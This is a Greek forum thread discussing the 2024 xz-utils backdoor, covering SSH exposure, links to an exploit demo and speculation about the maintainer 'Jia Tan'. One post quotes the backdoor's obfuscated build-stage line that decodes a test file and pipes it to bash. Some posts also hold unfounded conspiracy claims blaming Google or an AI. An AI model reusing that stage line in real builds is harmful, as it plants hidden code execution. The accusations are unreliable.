Backdoor στο xz-utils >=5.6.0

**GoofyX** · 01-04-24, 07:38

Αρχικό μήνυμα από jim_p

Αν καποιος κανει ενα καινουριο ssh key στο σερβερ του, δεν ειναι προστατευμενος απο ολο αυτο?

Μάλλον όχι. Αν φορτώνεται η μολυσμένη liblzma μαζί με τον sshd, τότε θα συνεχίσει να υφίσταται το backdoor.

Εν τω μεταξύ διάβαζα χθες το techrights (ένα blog που είναι κάργα αντί-Microsoft) και έλεγε ο τύπος ότι αυτό με το xz και το backdoor (και κανά 2-3 άλλα security vulnerabilities) βγήκε στον αέρα για να στρέψει τα φώτα της δημοσιότητας μακρυά από τους χιλιάδες απατσάριστων Exchange servers που είναι τρύπιοι: https://techrights.org/n/2024/03/31/...eal-news.shtml

Δεν ξέρω, τραβηγμένο μεν, αλλά δεν το αποκλείω να έχει και μια βάση αλήθειας.

**jim_p** · 01-04-24, 08:16

Γιατι να φορτωνεται και η προβληματικη liblzma αφου ενημερωθηκε?

**GoofyX** · 01-04-24, 08:32

Αρχικό μήνυμα από jim_p

Γιατι να φορτωνεται και η προβληματικη liblzma αφου ενημερωθηκε?

Ε προφανώς αν ενημερώθηκε δε θα φορτώνεται.

**jim_p** · 01-04-24, 08:36

Οποτε παμε σε αυτο που ειπα, πως αν καποιος εχει καινουρια κλειδια και μη προβληματικο xz + παρελκομενα, εινια ασφαλης.
Επισης, διανομες που ερχονται με ssh προεγκατεστημενο και ενεργο by default, πχ alpine, δεν θα επρεπε να κανουν το παραπανω αυτοματα?

**GoofyX** · 01-04-24, 08:46

Το ότι θα αλλάξεις το κλειδί του sshd δε σημαίνει αυτόματα ότι σώζεσαι.

Κι ένα ωραίο infographic:

Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση.

Όνομα: b5157017fbcebb8d.png
Εμφανίσεις: 39
Μέγεθος: 781,8 KB
ID: 255110

**K1m0n** · 01-04-24, 10:39

Αρχικό μήνυμα από GoofyX

Κι ένα ωραίο infographic:

Αυτός που το έγραψε είναι μερακλής πάντως.
Εγώ περιμένω πότε θα αρχίσουν να ανακαλύπτουν modular
(state/corporate-sponsored?) backdoors στο gcc + whatever lib.

Θα μου πεις, το βλέπουν τόσα μάτια...
ναι, σιγά μην υπάρχει άνθρωπος να καταλάβει όλο το gcc.

**GoofyX** · 01-04-24, 10:53

Μωρέ μάτια το βλέπουν, το θέμα είναι να το πιάσουν.

Όπως καταλαβαίνετε είναι γενικότερο πρόβλημα το όλο θέμα.

**Eruyome(MMXGN)** · 01-04-24, 11:06

Μα δεν θα κάτσουν να κοιτάξουν όλο τον κώδικα γραμμή γραμμή, γιατί προφανώς και μόνο οι του gcc θα καταλάβουν τον gcc (αυτό ισχύει και σε κλειστό κώδικα btw - και ειδικά σε κλειστό κώδικα με τα συχνά layoffs/αλλαγές δεν θέλω να σκέφτομαι πόσα άλλα "xz" υπάρχουν).

Απλά θα δουν οτι κάπου κάτι άλλο σκάει και θα το διερευνύσουν όπως τον μερακλή που έπιασε το xz. Τώρα ειδικά, πολύς περισσότερος κόσμος είναι υποψιασμένος.

**MyISLM** · 01-04-24, 14:55

Αρχικό μήνυμα από Eruyome(MMXGN)

Απλά θα δουν οτι κάπου κάτι άλλο σκάει και θα το διερευνύσουν όπως τον μερακλή που έπιασε το xz. Τώρα ειδικά, πολύς περισσότερος κόσμος είναι υποψιασμένος.

Θα λειτουργήσει θετικά.

**jim_p** · 02-04-24, 14:41

notes, honeypot, and exploit demo for the xz backdoor (CVE-2024-3094)
https://github.com/amlweems/xzbot

**~~SWBiiLive~~** · 02-04-24, 18:29

Αρχικό μήνυμα από SWBiiLive

αν αναρωτιέται κανείς ποια ηταν η μορφή της backdoor στην xz library, αυτή η γραμμή ειναι

Κώδικας:

" sed rpath ../../../tests/files/bad-3-corrupt_lzma2.xz | tr "	 \-_" " 	_\-" | xz -d | /bin/bash >/dev/null 2>&1;"

που οπως εξηγει αυτός που το βρηκε αφήνει ως αποτελεσμα...

Κώδικας:

 "| bash"

απο https://www.openwall.com/lists/oss-s...y/2024/03/29/4

τόσο απλά γιατι παιρνει pipe την bash!

και καπου εδω ξεκιναει το μεγαλο ψαξιμο στους κωδικες ..

π.χ.

Κώδικας:

grep -E -r -color "bash|sh|csh|tcsh|zsh|scsh|ksh"  --include=*.{h,cpp} .

δυστυχως δεν ειναι τοσο απλό το attack και με ενα απλο grep ΔΕΝ μπορει καποιος να το αποκαλυψει. Οχι οτι ειναι λάθος η grep εντολή που ειχα βαλει αλλά αυτή θα πρεπει να τρεξει αφου γινουν Deobfuscate όλα τα sed, tr, cut, eval κλπ στα ... 700 commits που εχει κάνει!!!

Αρχικό μήνυμα από K1m0n

1. Το όλο θέμα είναι ακόμα υπο διερεύνηση.

2. Απ'όσο ξέρουμε (και απ'όσο καταλαβαίνω μια ματιά που έριξα..):

Αν το ssh είναι προσβάσιμο από "έξω",
και το backdoor είναι ενεργό,
θα μπορούσε να συνδεθεί κάποιος 3ός (που έχει το κλειδί του backdoor),
και να αποκτήσει πρόσβαση στο σύστημα.

και ηδη εχουν αρχισει καποιοι και αναρωτιουνται μηπως δεν ειναι ανθρωπινο χερι πισω απο αυτην την επιθεση.

ειναι παρα πολυ προχο αυτο που εγινε γιατι κανει backdoor και αλλες υπηρεσιες ταυτοχρονα οπως το ssh στην προκειμενη περιπτωση

Αρχικό μήνυμα από GoofyX

Το ότι θα αλλάξεις το κλειδί του sshd δε σημαίνει αυτόματα ότι σώζεσαι.

Κι ένα ωραίο infographic:

αυτο το σχεδιαγραμμα δειχνει ποσο περιπλοκη ειναι η επιθεση και εγω ειμαι πλεον της αποψης οτι δεν ειναι ανθρωπινο χερι λογω πολυπλοκοτητας

ΑΙ εγραψε ο prophet ... https://gynvael.coldwind.pl/?id=782

"
2024-03-31 19:14:58 = prophet
{
i think Jia Tan is an AI
}
"

δεν ξέρω αν ειναι ΑΙ αλλά ενα ειναι το σιγουρο... ΘΑ ΜΠΟΡΟΥΣΕ ακριβως για τον λογο του οτι μια τετοια επιθεση στον κωδικα μονο με... νοημοσυνη ανιχνευεται!

υ.γ. επισης αυτος που το ανακάλυψε ειναι της MS ....

**Tsene** · 02-04-24, 18:52

https://learn.microsoft.com/en-us/cp...?view=msvc-170

Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση.

Όνομα: Screenshot 2024-04-02 165106.jpg
Εμφανίσεις: 77
Μέγεθος: 48,8 KB
ID: 255138

Φανταστείτε τι άλλο έχουν ακουμπήσει.

**~~SWBiiLive~~** · 02-04-24, 19:24

Αρχικό μήνυμα από Tsene

https://learn.microsoft.com/en-us/cp...?view=msvc-170

Φανταστείτε τι άλλο έχουν ακουμπήσει.

αυτό ειναι το ακριβες λινκ που ειναι ΑΚΟΜΑ UP οπως και του GITHUB του λογαριαμου... what?

jiaT75 on MS
https://learn.microsoft.com/en-us/cp...y-contributors

to link παει στο github του που ειναι UP
https://github.com/JiaT75

οργανισμος ... ο TOYKAΑNI. εεεε github ολα καλα?

https://github.com/tukaani-project

repositories 10 ...
https://github.com/JiaT75?tab=repositories

και εχουμε και κλαιμε!
https://github.com/JiaT75/oss-fuzz <-- ΚΑΙ ΤΩΡΑ ΑΡΧΙΖΟΥΝ ΤΑ ΔΥΣΚΟΛΑ ΓΙΑ ΤΗΝ ΓKOYLAGK... google / oss-fuzz . AYTO EINAI TO ΜΟΝΑΔΙΚΟ REPO ΠΟΥ ΕΙΝΑΙ ΓΙΑ... HACKERS... TYXAIO? ΔΕΝ ΝΟΜΙΖΩ
https://github.com/JiaT75/cpp-docs
https://github.com/JiaT75/wasmtime <-- A standalone runtime for WebAssembly. δηλαδη ολοι οι συγχρονοι browsers !!! back to palemoon on windows 7 asap

https://github.com/JiaT75/squashfs-tools <-- Squashfs is a compressed read-only file system for Linux. Squashfs compresses files, inodes and directories. Squashfs is used by the Live CD versions of Arch Linux, Clonezilla, Debian, Fedora, Gentoo Linux, KDE neon, Kali Linux, Linux Mint, NixOS, Salix, Ubuntu, openSUSE and on embedded distributions such as the OpenWrt[1] and DD-WRT router firmware.

ΑΝ ΕΧΕΙ ΠΕΙΡΑΞΕΙ ΑΥΤΟ ΕΔΩ ΘΑ ΜΙΛΑΜΕ ΓΙΑ ΑΣΥΛΛΗΠΤΑ ΤΕΡΑΣΤΙΑ ΖΗΜΙΑ

https://github.com/JiaT75/STest
https://github.com/JiaT75/libarchive <-- The libarchive project develops a portable, efficient C library that can read and write streaming archives in a variety of formats. It also includes implementations of the common tar, cpio, and zcat command-line tools that use the libarchive library.
https://github.com/JiaT75/seatest
https://github.com/JiaT75/zstd
https://github.com/JiaT75/lz4 < --- λολ Beyond the C reference source, many contributors have created versions of lz4 in multiple languages (Java, C#, Python, Perl, Ruby, etc.). A list of known source ports is maintained on the LZ4 Homepage. TO firefox το χρησιμοποιει απο οτι ξερω. εδω ειμαστε να δειτε για ποτε θα σκασει και αυτο!!!
https://github.com/JiaT75/ZipArchive <---- ZipArchive is a simple utility class for zipping and unzipping files on iOS, macOS and tvOS. WHAT?

ΕΠΙΣΗΣ ... ΑΦΗΝΩ τις 2 πρωτες δραστηριοτητες του... 1α σε private και μετα στα lz4 που τα χρησιμοποιει κατακορον ο FIREFOX, ο μοναδικός πλεον αντιπαλος του Chromium ακα Chrome + edge +κλπ = 70% της αγορας! ΠΗΓΗ. https://gs.statcounter.com/browser-market-share

ΑΡΧΙΚΑ

Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση.

Όνομα: JiaT75 (JiaT75) _1ST-Repositories · GitHub.JPG
Εμφανίσεις: 12
Μέγεθος: 72,2 KB
ID: 255143

KAI META

Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση.

Όνομα: JiaT75 (JiaT75) _ Repositories · FIRST-ATTACKS.JPG
Εμφανίσεις: 10
Μέγεθος: 86,2 KB
ID: 255144

Υ.Γ. τιποτα δεν ειναι τυχαιο στην ζωη ... και τωρα καταλαβα γιατι δεν το εκλεισε το github το να τα δουμε... οι ενδειξεις σιγουρα δεν ειναι αποδειξεις αλλα αν δεν μαθουμε ποια private repo χρησιμοποιουσε δεν προκειται να βγαλουμε ασφαλη συμπερασματα. ομως δυστυχως για την γκουγκλ το repo της ειναι το μονο που δεν εχει καμια σχεση με ολα τα υπολοιπα που ειναι για συμπιεση ΚΑΙ οτι τα firefox + SAFARI που στοχοποιηθηκαν απο την δραστηριοτητα αυτου του jiT75 ειναι οι μοναδικοι αντιπαλοι του ... chromium !

**GoofyX** · 02-04-24, 19:55

Τα private repositories μην τα κοιτάς, τα public έχει σημασία. Προσπαθώ να βρω στο github τα PR του χρήστη αυτού, αλλά δεν φαίνεται να βρίσκει κάτι, εκτός αν κάνω κάτι λάθος εγώ.

Ό,τι έγινε έγινε, κάθε repository που έκανε commit ο συγκεκριμένος το ψάχνουν οι υπόλοιποι devs.

Το θέμα είναι από τώρα και έπειτα τι γίνεται...

**~~SWBiiLive~~** · 02-04-24, 20:25

Αρχικό μήνυμα από GoofyX

Τα private repositories μην τα κοιτάς, τα public έχει σημασία. Προσπαθώ να βρω στο github τα PR του χρήστη αυτού, αλλά δεν φαίνεται να βρίσκει κάτι, εκτός αν κάνω κάτι λάθος εγώ.

Ό,τι έγινε έγινε, κάθε repository που έκανε commit ο συγκεκριμένος το ψάχνουν οι υπόλοιποι devs.

Το θέμα είναι από τώρα και έπειτα τι γίνεται...

μέχρι να βρουν οι devs του firefox τι εκανε ο λεγαμενος στην lz4, firefox δεν ξαναχρησιμοποιοω στα linux και σταματαω και τo chromium και μαλλον θα ξαναγυρισω στα windows 7 και στο palemoon που δεν χρησιμοποιει WebAssembly

ειχαμε καταλαβει οτι κατι δεν παει καλα με το chromium projectσ οταν στην σελιδα του με τα fork του υπαρχουν μονο το chrome και το chromiumOS (ουτε καν ο edge που της εδωσε +5%) https://www.chromium.org/chromium-projects/

Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση.

Όνομα: CHROMIUM-PROJECTS.JPG
Εμφανίσεις: 2
Μέγεθος: 103,0 KB
ID: 255147

υ.γ. φαινεται εχει μαζεψει πολλους πονηρους στα γραφεια της...

Θέμα: Backdoor στο xz-utils >=5.6.0

Tags για αυτό το Θέμα

Bookmarks

Bookmarks

Δικαιώματα - Επιλογές